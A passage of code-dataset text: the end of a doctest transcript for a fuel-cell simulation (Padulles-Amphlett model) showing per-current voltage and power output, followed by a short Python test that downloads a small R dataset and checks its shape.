4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done! >>> Padulles_Amphlett_Data["Status"] True >>> Padulles_Amphlett_Data["P"][5] 2.724941943281497 >>> Padulles_Amphlett_Data["I"][5] 0.6 >>> Padulles_Amphlett_Data["V"][5] 4.541569905469162 >>> Padulles_Amphlett_Data["EFF"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data["PO2"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data["PH2"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data["PH2O"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data["Ph"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data["VE"][5] 4.553525621759973 >>> Padulles_Amphlett_Data["V0"] 4.698326931114575 >>> Padulles_Amphlett_Data["K"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data["Status"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":2,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":5,"i-stop":0.1,"i-step":-2,"Name":"Test"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... Warning : The value of I(>0.1) leads to minus amount of V, please check your inputs Done! >>> shutil.rmtree("Padulles-Amphlett") '''
<filename>tests/r/ from __future__ import absolute_import from __future__ import division from __future__ import print_function import shutil import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): """Test module by downloading rep_vict.csv and testing shape of extracted data has 8 rows and 8 columns """ test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8) except: shutil.rmtree(test_path) raise()